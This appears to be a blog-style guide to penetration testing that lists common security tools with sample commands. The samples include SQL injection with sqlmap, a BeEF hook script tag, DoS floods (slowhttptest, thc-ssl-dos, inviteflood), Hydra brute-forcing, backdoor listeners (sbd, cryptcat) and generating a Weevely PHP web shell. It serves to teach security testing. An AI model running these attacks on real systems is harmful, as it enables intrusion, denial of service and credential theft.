While producing high-technology mobile apps and websites, there is no way around security issues. That is why there are many top-notch pentest tools for handling multiple workflows that allow detection, elimination, and prevention of web security attacks.

What is Penetration Testing?

The idea behind any penetration test is to identify security-related vulnerabilities in a software application by conducting a controlled security attack, to determine how much damage an attacker could cause when trying to compromise the product. The results of this practice help to make applications and software more secure, robust, and hard to break, and the users' experience more successful. So, if you are going to develop and use any software for your business, the automated penetration testing method will help you to check for network security threats.

How Penetration Tests Work

Penetration testing is a simulated real-time cyber-attack conducted by certified security professionals (ethical hackers) under controlled conditions to detect gaps, glitches, vulnerabilities, loopholes, misconfigurations, etc. that are susceptible to malicious code injection, malware, unauthorized entry, and other attacks. Application testers then try to exploit these vulnerabilities, typically by stealing data, escalating privileges, intercepting traffic, etc., to understand the nature of the damage they may cause. However, it is hard to find all possible vulnerabilities using automated tools. There are some threats that can only be identified by manual system scans.

To uncover the security vulnerabilities that can be found in any kind of web application, there are three major test types:

Black Box Testing;
White Box Testing;
Gray Box Testing.

Black box testing: A black box assessment is performed without any knowledge of the system's internals. Here testers examine the system solely from the outside. They have no idea of what is happening within the system to generate responses to their test actions.
White box testing: In a white box assessment, the testers have the fullest and most complete internal knowledge of the system being tested (design docs, source code, etc.).
Gray box testing: Gray box testing is another application security test technique that is a mix of both white box and black box testing.

Best Penetration Testing Tools

01. Database Tools

sqlmap: automates the process of detecting and exploiting SQL injection flaws and taking over database servers.

sqlmap -u victim_url
sqlmap --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 --risk=3 -p id --suffix="-BR" -v 3
02. CMS Scanning Tools

WPScan

wpscan --version
wpscan --url <URL of webpage>

Joomscan

joomscan -h
joomscan --version
joomscan /?
joomscan -u victim_url
03. SSL Scanning Tools

TLSSLed

tlssled URL port

w3af: web application attack and audit framework

w3af
enter the URL of the target and click start

04. Metasploit

msfupdate
msf > search name:Microsoft type:exploit
Armitage: GUI for Metasploit

BeEF

beef-xss
default username and password: beef
hook script: <script src="http://192.168.1.101:3000/hook.js" type="text/javascript"></script>
Linux Exploit Suggester

root@parrot:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

Forensics Tools

p0f: identifies the operating system of a target host simply by examining captured packets. In the hands of advanced users, p0f can detect firewall presence, NAT use, and the existence of load balancers.

p0f --version
p0f -h
p0f -i eth0 -p -o filename
open 192.168.1.2

pdf-parser: parses a PDF document to identify the fundamental elements used in the analyzed PDF.

pdf-parser -o 10 filepath
dumpzilla: extracts all forensically interesting information from Firefox, Iceweasel, and Seamonkey browsers.

ddrescue: copies data from one file or block device (hard disk, CD-ROM, etc.) to another, trying to rescue the good parts first in case of read errors.

dd_rescue infilepath outfilepath
dd_rescue -v /dev/sdb ~/sec.img

DFF

dff-gui

Social Engineering

Social Engineering Toolkit

sudo apt install sendmail
vim config/set_config
# change the SENDMAIL=OFF flag to SENDMAIL=ON
05. Stressing Tools

Used for DoS attacks or to create a stress test for different applications, so as to take appropriate measures for the future.

Slowhttptest

slowhttptest --version
slowhttptest -h
# sample
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET -u http://192.168.1.202/index.php -x 24 -p 2

Where,
-c 500 = 500 connections
-H = Slowloris mode
-g = generate statistics
-o outputfile = output file name
-i 10 = use 10 seconds to wait for data
-r 200 = 200 connections per second
-t GET = GET requests
-u http://192.168.1.202/index.php = target URL
-x 24 = maximum length of 24 bytes
-p 2 = 2-second timeout

Inviteflood: SIP/SDP INVITE message flooding over UDP/IP.

inviteflood --version
# format
inviteflood eth0 target_extension target_domain target_ip number_of_packets
# sample
inviteflood eth0 2000 192.168.x.x 192.168.x.x 1
Where,
target_extension is 2000
target_domain is 192.168.x.x
target_ip is 192.168.x.x
number_of_packets is 1
-a is the alias of the SIP account

Iaxflood: VoIP DoS tool

iaxflood --version
iaxflood -h
iaxflood sourcename destinationname numpackets
iaxflood ip_src ip_dest packets
thc-ssl-dos: verifies the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client.

# format
thc-ssl-dos victimIP httpsport --accept
# example
thc-ssl-dos 192.168.1.1 443 --accept
06. Sniffing & Spoofing

Burpsuite: the sniffing tool between your browser and the web servers, used to find the parameters that the web application uses.

mitmproxy: SSL-capable man-in-the-middle HTTP proxy.

mitmproxy --version
mitmproxy -h
mitmproxy -p portnumber
mitmproxy -p 80

07. Wireshark

sslstrip: MITM attack that forces a victim's browser to communicate in plain text over HTTP.

sslstrip --version
sslstrip -h
sslstrip -p 80
08. Password Cracking Tools

Hydra: login cracker that supports many protocols to attack.

hydra -L /usr/share/wordlists/metasploit/user -P /usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 -V

Johnny: GUI for the John the Ripper password cracking tool.
John: CLI behind the Johnny GUI.

unshadow passwd shadow > unshadowed.txt

Rainbowcrack: cracks hashes by rainbow table lookup.

rcrack -h
rcrack path_to_rainbow_tables -f path_to_password_hash
./rcrack . -h 5d41402abc4b2a76b9719d911017c592
./rcrack . -l hash.txt

09. SQLdict

Dictionary attack tool for SQL Server.

sqldict
Under "Target IP Server", enter the server IP.
Under "Target Account", enter the username.
Load the file with the passwords and click Start.

hash-identifier: identifies types of hashes.

hash-identifier 5d41402abc4b2a76b9719d911017c592
10. Maintaining Access

Tools used to maintain a connection to, and access to, a compromised machine even when it disconnects and reconnects.

Powersploit: helps to connect to the victim's machine via PowerShell.

cd /usr/share/powersploit/

Sbd: similar to Netcat; features AES-CBC-128 + HMAC-SHA1 encryption.

# server
sbd -l -p 44
# victim
sbd 192.168.43.2 44
Weevely: PHP web shell that simulates a telnet-like connection, used as a stealth backdoor.

# check
weevely -h
# format
weevely generate password pathoffile
# sample
weevely generate adm1n123 ~/Desktop/about1.php
# format
weevely URL password
# sample
weevely http://198.168.32.13 adm1n123
http-tunnel: creates a bidirectional virtual data stream tunneled in HTTP requests. This can be useful for users behind restrictive firewalls.

# server
httptunnel_server -h
# client
httptunnel_client -h

cryptcat: similar to Netcat; allows making TCP and UDP connections with a victim's machine in an encrypted way.

# server
cryptcat -l -p port -n
# client
cryptcat IPofServer PortofServer
11. Reverse Engineering

OllyDbg: 32-bit assembler-level analyzing debugger for MS Windows applications, used to crack commercial software.

ollydbg

dex2jar: converts an APK file (Android) to a JAR file in order to view the source code.

d2j-dex2jar -d <file location>
d2j-dex2jar -d ~/Desktop/class.dex

jd-gui: standalone graphical utility that displays the Java source code of ".class" files.

jd-gui

apktool: one of the best tools to reverse an entire Android application.

apktool
# decompile
apktool d file.apk
12. Reporting Tools

Dradis

service dradis start
dradis
open https://machine_ip:3004
import files from NMAP, NESSUS, NEXPOSE

Metagoofil: searches Google to identify and download documents to the local disk, then extracts their metadata.

# help
metagoofil -h
metagoofil -d udsm -t docx -l 3 -o ~/Downloads -f ~/Downloads/metagoofil_res

-d (domain name)
-t (file type to download: docx, pdf, etc.)
-l (limit the results, e.g. 10, 100)
-n (limit files to download)
-o (location to save the files)
-f (output file)

Misc

strace

# format
strace -e trace=network,read,write /path/to/app args
# example
strace -e trace=network,read,write customapp